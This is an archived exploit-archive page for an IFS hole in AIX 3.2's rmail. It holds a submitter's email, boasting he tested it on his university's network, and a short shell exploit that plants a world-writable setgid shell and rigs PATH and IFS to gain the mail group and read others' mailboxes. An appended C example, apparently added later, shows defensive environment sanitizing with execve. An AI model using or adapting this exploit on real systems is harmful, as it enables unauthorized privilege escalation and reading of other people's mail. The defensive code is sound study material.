AIX rmail hole
Description: IFS attack, apparently AIX may be using system()
Vulnerable Systems: AIX 3.2, perhaps earlier
Date: 10 May 1998 (it is actually much older)
Notes: Thanks to the person who submitted this to me!
Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
Subject: AIX oldie
First, let me tell you that your pages are great - but you already
know that, don't you?
I noticed you have an exploit section sorted by OS; here's an oldie
but goodie for AIX boxes running 3.2. The exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
I successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)
I guess you probably know of this ancient IFS hole; just in case you
wanted to include it in your pages ...
cya & keep up the marvelous work,
# IFS hole in AIX3.2 rmail gives egid=mail.
# Setup needed files.
cp sh mailsh
chmod 2777 mailsh
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail firstname.lastname@example.org
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
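The hole above is a setgid program handing a command line to system(), so the caller's PATH and IFS decide what actually runs. As an added example (not from this page, the submitter, or AIX), this is the defensive pattern a privileged helper should use instead: build its own environment from an allowlist with PATH pinned, and fork/execve an absolute path so no shell is involved. env_get, build_safe_env and run_helper_clean are hypothetical names; the sample environment in the test is constructed.

```c
#define _POSIX_C_SOURCE 200809L  /* strdup, fork, execve, waitpid */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Allowlist of inheritable variables; everything else (IFS included) is dropped. */
static const char *const KEEP[] = { "TZ", "LANG", NULL };
#define SAFE_PATH "PATH=/usr/bin:/bin"   /* pinned: never a caller-chosen directory */
/* Value of NAME in a NULL-terminated "NAME=value" array, or NULL if absent. */
const char *env_get(char *const *env, const char *name) {
    size_t len = strlen(name);
    for (; env && *env; env++)
        if (strncmp(*env, name, len) == 0 && (*env)[len] == '=') return *env + len + 1;
    return NULL;
}

/* Fresh environment: SAFE_PATH plus whichever KEEP variables the caller had. */
char **build_safe_env(char *const *caller_env) {
    size_t n = 0;
    char **out = calloc(sizeof KEEP / sizeof *KEEP + 1, sizeof *out);
    if (!out) return NULL;
    out[n++] = strdup(SAFE_PATH);
    for (size_t k = 0; KEEP[k]; k++) {
        const char *val = env_get(caller_env, KEEP[k]);
        if (!val) continue;
        if ((out[n] = malloc(strlen(KEEP[k]) + strlen(val) + 2)) != NULL)
            strcat(strcat(strcpy(out[n++], KEEP[k]), "="), val);
    }
    return out;  /* calloc already supplied the terminating NULL */
}

void free_env(char **env) {
    for (size_t i = 0; env && env[i]; i++) free(env[i]);
    free(env);
}

/* fork/execve an absolute path with the sanitized environment: no shell is involved,
 * so the caller's IFS and PATH cannot redirect it as with rmail's system(). */
int run_helper_clean(const char *abs_path, char *const argv[], char *const *caller_env) {
    if (!abs_path || abs_path[0] != '/') return -1;  /* refuse relative paths */
    char **env = build_safe_env(caller_env);
    if (!env) return -1;
    pid_t pid = fork();
    if (pid == 0) { execve(abs_path, argv, env); _exit(127); }
    free_env(env);
    int status;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```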
This page is part of Fyodor's exploit